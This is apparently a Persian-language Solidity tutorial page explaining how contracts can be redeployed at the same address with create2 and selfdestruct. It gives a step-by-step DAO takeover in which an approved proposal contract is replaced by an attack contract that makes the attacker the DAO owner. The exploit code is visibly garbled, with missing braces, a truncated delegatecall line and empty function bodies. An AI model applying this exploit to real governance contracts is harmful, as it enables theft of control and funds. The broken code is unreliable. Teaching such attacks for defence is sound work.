Siblearn Academy siblearn academy

Deploy Different Contracts at the Same Address

آدرس قرارداد مستقر با ايجاد كردن به روش زیر محاسبه می شود.

جایی که فرستنده آدرس اعزام کننده است و هیچ تعداد تراکنش های ارسال شده توسط فرستنده.

بنابراین، اگر بتوانیم به نحوی آن را بازنشانی کنیم، می‌توان قراردادهای مختلف را در یک آدرس مستقر کرد هیچ.

در زیر نمونه ای از نحوه هک شدن DAO آورده شده است.

contract address = last 20 bytes of sha3(rlp_encode(sender, nonce))
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;

Called by Alice
0. Deploy DAO

Called by Attacker
1. Deploy DeployerDeployer
2. Call DeployerDeployer.deploy()
3. Call Deployer.deployProposal()

Called by Alice
4. Get DAO approval of Proposal

Called by Attacker
5. Delete Proposal and Deployer
6. Re-deploy Deployer
7. Call Deployer.deployAttack()
8. Call DAO.execute
9. Check DAO.owner is attacker's address

DAO -- approved --> Proposal
DeployerDeployer -- create2 --> Deployer -- create --> Proposal
DeployerDeployer -- create2 --> Deployer -- create --> Attack

contract DAO {
    struct Proposal {
        address target;
        bool approved;
        bool executed;

    address public owner = msg.sender;
    Proposal[] public proposals;

    function approve(address target) external {
        require(msg.sender == owner, "not authorized");

            Proposal({target: target, approved: true, executed: false})

    function execute(uint256 proposalId) external payable {
        Proposal storage proposal = proposals[proposalId];
        require(proposal.approved, "not approved");
        require(!proposal.executed, "executed");

        proposal.executed = true;

        (bool ok,) =
        require(ok, "delegatecall failed");

contract Proposal {
    event Log(string message);

    function executeProposal() external {
        emit Log("Excuted code approved by DAO");

    function emergencyStop() external {

contract Attack {
    event Log(string message);

    address public owner;

    function executeProposal() external {
        emit Log("Excuted code not approved by DAO :)");
        // For example - set DAO's owner to attacker
        owner = msg.sender;

contract DeployerDeployer {
    event Log(address addr);

    function deploy() external {
        bytes32 salt = keccak256(abi.encode(uint256(123)));
        address addr = address(new Deployer{salt: salt}());
        emit Log(addr);

contract Deployer {
    event Log(address addr);

    function deployProposal() external {
        address addr = address(new Proposal());
        emit Log(addr);

    function deployAttack() external {
        address addr = address(new Attack());
        emit Log(addr);

    function kill() external {

روی محیط توسعه ی Remix امتحان بکنید

  • TornadoHack.sol
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